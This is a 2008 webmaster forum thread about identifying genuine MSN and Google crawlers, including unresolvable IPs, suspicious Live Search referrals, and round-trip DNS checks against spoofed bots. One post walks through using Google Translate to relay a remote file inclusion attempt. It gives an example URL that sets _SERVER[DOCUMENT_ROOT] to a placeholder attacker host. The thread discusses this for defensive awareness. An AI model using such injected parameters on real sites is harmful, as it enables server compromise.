Forum Moderators: open
I noticed at least 2 ips reading the logs, coming from the msn bot
65.55.108.194, 65.55.25.149
cannot be resolved to a host.
I saw another ip from slurp that was resolving to the .net domain instead of the .com. In both cases attempting to match the agent info with the ip and host would return a false. Does anyone knows if there is a workaround?
I could not post on that thread as it was a bit old.
65.55.108.194
"msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
I've had a portion of the UA denied since September 2006 when MS attempted to standardize their bot UA's.
Both the previous UA's and the 2006 standardized UA's had MSN failing to comply with robots.txt for their MEDIA bot, which resulted in my denial.
Nothing in my saved files on 25-Class C.
What does the UA look like?
I could not post on that thread as it was a bit old.
As an aside; you may always provide a link to an old thread (in a newer thread) for reference.
Don
As of the reference, yes, here is the link to the thread I was reading earlier on:
[webmasterworld.com...]
SetEnvIfNoCase User-Agent msnbot\-media keep_out
which does not even allow them access to robots.txt (bad choice for most), as a result the bot keeps returning (due to my aforementioned bad choice)regulary on endless crawls eating 403's.
So my question is should I block them by default or fall back checking some ip ranges or do something else perhaps?
Neither I, nor anybody else may provide insight into what is best for your own site (s).
We each must decide what is beneficial or detrimental.
I am able to convey that denying access to "msnbot-media" has NOT affected my other msn crawls.
Don
65.55.232.29 - - [18/Nov/2008:01:39:16 -0500] "GET /someurl.html HTTP/1.1" 200 10415 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
Another thing I notice is that ips that successfully resolved one time do not resolve afterwards. I placed a loggin mechanism to see when and how often the host has a different value when the ip is resolved
is an example of an MSN issue.
65.55.165.zz, not a bot, however somehow with the ability to grab pages in a fashion similar to a bot.
I focused on the "search.live" denial, (which I may change)at the time because I was not so sure the user would not simply returm on another Class C range.
The user returns and always with the same IP and I've over-reacted by penalizing ALL "search.live" users.
MSN offers us "practices" that others simply don't use.
The 131.107.-.- and the many things that have come through those IP's in five years are one example.
65.55.232.29 - - [03/Nov/2008:13:00:08 -0500] "GET /robots.txt HTTP/1.1" 200 85 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
Why it would need the robots.txt at that time?
As of the IP range I checked the logs again and I see different UAs some with valid browser signatures. Now what I don't see, is none of these accesses, although they occur very often (same day), do not follow the headers the server sends, like the 304 cache.
And finally I see like 100 different page accesses on the server within the same minute from that ip range you posted.
Don, do you mean these are actual users (humans) that indirectly come from the livesearch? (eg: if you were checking the cached page?) I see accesses at the robots.txt file at the same time along with other scripts though:
enigma,
My apologies, I didn't mean to confuse the issue.
I merely presented it because of the same occurence of IP as you had provided previously.
The link to the other thread was a sort of pre-fetch by "search.live". I'm inclined to believe that it was either the same human using the search as some sort of proxy and/or tool.
The page requests were all in succession and absent of requests for robots.txt, images or CSS.
It has happened on more occassion, since the intial date and all by the same IP.
Early recognition and/or action against these "bot-like" requests (even though they may not be bots), tend to nip things in the backside before they escalate (thus this forum), or the user locates a more effective tool.
I don't utilize header checks, thus I'm no help in that regard. Bill, Jim and many of the others do use headers.
In addition, I've numerous references in my logs to the 65.55.232. Class C that you've provided (no reason for me NOTt to believe that it's a valid MSN bot). Even be presented with invalid headers.
Some of these requests (i. e., 65.55.232.) were in close time-proximity to the 65.55.165.zz "search.live" requests, however NOT in succession or close enough time-proximity that I could associate BOTH IP's as the same data requests.
[projecthoneypot.org...]
Perhaps it shows that some of the services Microsoft provides are abused. What I don't understand is how comes they're all over the place. There way too many for them not to know about.
This has been covered elsewhere on WWW but it looks like an attempt by MS to verify their own results. Certainly I'm only seeing a handful of non-bot hits a day, mostly spaced out (this month: 41 non-bots to 282 bots). Could be they are tring to tie the bot and non-bot together. It doesn't look like third party usage here.
One possibility, I suppose, is that they are using the non-bot UA to grab cache pages (I haven't checked for imge-fetching).
I'm seeing a similar pattern with google. I've given up trying to understand yahoo / ask's wild forays - ask may soon be banned!
There are a lot of internet services that can be abused by an attacker to serve his purpose. For instance search engines have translations services where an IP may not resolved to a host name although it does belong to the search engine's server ip range, can be activated by anyone who requests a page translation and then the link to "translate" is forged to contain say some SQL injection or Remote File Inclusion and the like.
If you see the other link I posted above it shows the same IP to be used for sending spam emails. With the particular honeypot, it seems blacklisted. In reality it could be just one of the service Microsoft provides (eg: accounts), where someone injected some script to do his dirty job.
I am seeing lots of stuff in the server logs with RFI attempts for instance, coming from yahoo accounts. Seems like these accounts were opened specifically for that purpose. Some "txt" files that are hard to detect are then used for the RFI attempts and contain some actual code like php, so if the security hole of the specific script/web-engine/server is not patched the attacker may gain direct or indirect control.
Upto this point I am unable to find some reliable way to detect whether a sever access is legitimate or indirect and/or reliably identify bots vs humans. In contrast I see more and more evidence where a script could be setup in such a way to behave like a real person with a proper browser.
Where I discover abusive avtivity from a server farm I tend to block the IP range for that farm. There are a lot of nasties and very few legitimate bots that come from server farms, and I think I've whitelisted all of the good ones I'm prepared to give access to.
[voices.washingtonpost.com...]
The article is recent and implies that services of major vendors are abused for various spam purposes.
The DNS resolution is also something I deploy for the scripts. It won't stop them always, they still appear with valid host names and valid ips and UAs. DNS spoof is another area they exploit.
One other thing that may sound awkward I am experimenting with, is to simply perform a search against an IP with popular search engines. If I see results coming up and the IP attempts to get in pretending to be human the odds are to be some sort of hack or spam attempt.
The results that typically come up are from web-statistics posted by various hosts (unbelievable but true) when the attempt caused some sort of error (eg: 404). Although this practice is far from perfect it may give a hint on the intentions of the visitor.
The DNS resolution is also something I deploy for the scripts. It won't stop them always, they still appear with valid host names and valid ips and UAs. DNS spoof is another area they exploit.
Totally impossible using full trip DNS.
You do reverse DNS then do a forward DNS and see if the IP matches.
If it doesn't match it's DNS spoofing.
For efficiency and speed, I cache that information for 24 hours then test it again.
[edited by: incrediBILL at 10:45 pm (utc) on Nov. 23, 2008]
There is another detailed page that explains pretty much everything about the approach.
[unixwiz.net...]
It also shows workarounds that evolved to counter the effects of dns cache poisoning.
Yes caching the results is quite easy, but don't we need to be sure the results are right?
I can DNS spoof any IP I own to return "crawl*.googlebot.com".
However, if you run "crawl*.googlebot.com" to get the IP it won't match because I don't have control of googlebot.com so I can't fake it in that direction.
Worrying about DNS cache poising is like worrying about IP spoofing, it's possible but highly unlikely. If you get nailed with DNS poisoning there'll be a whole bunch of other people also in trouble, you won't be alone.
When I discuss caching the results, I mean I merely record the results of the full trip DNS check to a temporary file under my control.
If the results are spoofed, I record spoofed results.
Can't worry about that as I have to assume my host DNS servers are secure as they updated all the patches mentioned in the PPT above.
Obviously part of google's range but it has no rDNS and arrives with anything from a blank UA to a google translate one. It seems it can be used by google to service translations but there is no rDNS check, only the fact that it belongs to google. In the case of blank and other scraper UAs it's probably going via a proxy, although it doesn't register as such in my logs.
I'm loathe to block the range, even if it comes up with scrapers, since it also seems to be a legit google service. But if google won't admit the usage and can't be bothered to designate specific and separate IPs for their own services and for proxies what else is there to do? Either lose the translation or other legit services or accept the scrape attempts.
I can't see double-checking the DNS in this instance will result in anything other than a block, but that could well be the wrong action at least some of the time.
And what do you do with the 72.14.193.* range, Bill?
Bill's a pest ;)
I'd be more interested if Jim has made any adjustments in his end?
Personally, I've had the 72.14. denied for an eternity.
And most of the other SE-based extra-tools, however I'm an extremist and it has been suggested jokingly that I should just "deny-all" :)
Don
And what do you do with the 72.14.193.* range, Bill?
First off, you have to qualify what kind of activity you see in that range.
Remember, I don't run hard rules mostly, I run dynamic scripts that analyze the behavior on the fly so any IP that is being multi-purposed in a SE's range of IPs will be dealt with based on what it's currently doing.
If it says googlebot and the DNS doesn't resolve to crawl*.googlebot.com, it's instantly blocked therefore someone trying to spoof googlebot via the translator gets the heave ho.
If it's not a valid browser, says "Java" or something similar, blocked.
Google translator is permitted but each IP forwarded by the proxy is tracked separately and the white listed rules for user agents will still be imposed so anything other than an allowed browser is blocked.
Someone's script trying to scrape thru the translator gets to have a conversation with with a captcha, etc.
Basically, I don't have a single answer to your question, but a series of strategies designed to stop the automated nonsense and still let humans do their thing as much as possible.
I can't see double-checking the DNS in this instance will result in anything other than a block, but that could well be the wrong action at least some of the time.
Been doing it for 2 years, ever since the SEs said it was the proper method of validation, with no ill effects.
[edited by: incrediBILL at 9:52 pm (utc) on Nov. 24, 2008]
First off, you have to qualify what kind of activity you see in that range.
1. goto [translate.google.com...]
2. say we want translation from english to spanish
3. populate the "translate a web page" url
http://www.example.com/index.html/?_SERVER[DOCUMENT_ROOT]=http://rfi.example.com/nasty.htm
In the particular case google should not allow direct translation but perhaps only translate directly from pages it contains in its cache. Avoiding the direct access and assuming a bot indexes a site from the domain only (and not from external links that can also make rfi attempts) it would make sense. But instead it can be used as an open uri for rfi attempts (or content scrap and the like).
1. A new page/article was published yesterday on a site (site has no particular rank). Where sample_page.html is basically the new page. The real name of the page was replaced with sample_page.html
2. The first IP is the msnbot, crawls the page for the first time. First accesses robots.txt, then accesses the new page. That IP is resolved so the real page content is given.
3. The second IP also comes from the msft servers and accesses the same page 2 minutes later. It contains a referrer which implies the page was basically found via the live facility. The 2nd ip does not resolve to a ptr, rnds does not return anything.
Log Entries:
65.55.105.16 - - [28/Nov/2008:19:49:42 -0500] "GET /robots.txt HTTP/1.1" 200 0 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.16 - - [28/Nov/2008:19:49:43 -0500] "GET /sample_page.html HTTP/1.1" 200 43435 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.107.245 - - [28/Nov/2008:19:51:42 -0500] "GET /sample_page.html HTTP/1.0" 200 9799 "http://search.live.com/results.aspx?q=sample_page" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
In other words the log entries imply: a) msnbot comes in crawls new page. b) within 2 minutes the page is indexed, published in live someone searched for it and was accessed right away by "someone".
The UA is fake of course the 2nd ip access was done by a bot and receives something else instead of the real page content.
The UA is fake of course the 2nd ip access was done by a bot and receives something else instead of the real page content.
This refer (search.live.) eats 403's on my sites!
Too bad for the innocent and/or valid users.
I had sixteen requests in succession this morning from the 165 Class C, while utilizing fifteen different Class D's.
No requests for robots or images.
Many of the refers contained the name of the page (absent of extension).
MSN needs to resolve these issues, else I'm going to be adding more Class C's to my denials, which I'm sure will lead to some valid bots. :(
Don
I have no reason to believe that any sentient living being uses Live Search.
I had ONE ;) just yesterday, which was a valid widget search topic.
The visitor initially entered one of my sites and was denied based on the refer.
I've another directory which does not place that restriction on live.search, however the images and supporting files (CSS) are from the sites other directories and 403'd. Once the visitor was allowed access via the open-directory (after being denied in the initial request)?
Normal traffic patterns occurred, which were on-topic for the initial search.
Course, this may be a rare exception!
Don